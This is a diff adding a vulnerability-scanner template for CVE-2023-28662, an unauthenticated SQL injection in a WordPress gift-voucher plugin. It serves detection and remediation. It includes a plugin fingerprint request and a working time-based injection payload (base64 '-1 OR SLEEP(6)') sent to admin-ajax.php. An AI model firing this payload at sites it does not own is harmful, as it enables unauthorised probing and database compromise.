diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml new file mode 100644 index 0000000000..a39e9241e3 --- /dev/null +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -0,0 +1,61 @@ +id: CVE-2023-28662 + +info: + name: Wordpress Gift Cards <= 4.3.1 - SQL Injection + author: xxcdd + severity: critical + description: | + The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. + remediation: | + Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available. + reference: + - https://www.tenable.com/security/research/tra-2023-2 + - https://wordpress.org/plugins/gift-voucher/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/JoshuaMart/JoshuaMart + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-28662 + cwe-id: CWE-89 + epss-score: 0.00076 + epss-percentile: 0.31593 + cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* + metadata: + vendor: codemenschen + product: gift_vouchers + framework: wordpress + fofa-query: body="/wp-content/plugins/gift-voucher/" + tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Gift Vouchers and Packages' + + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=wpgv_doajax_voucher_pdf_save_func&template=LTEgT1IgU0xFRVAoNik= + + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 500 + - contains(body, 'critical error') + condition: and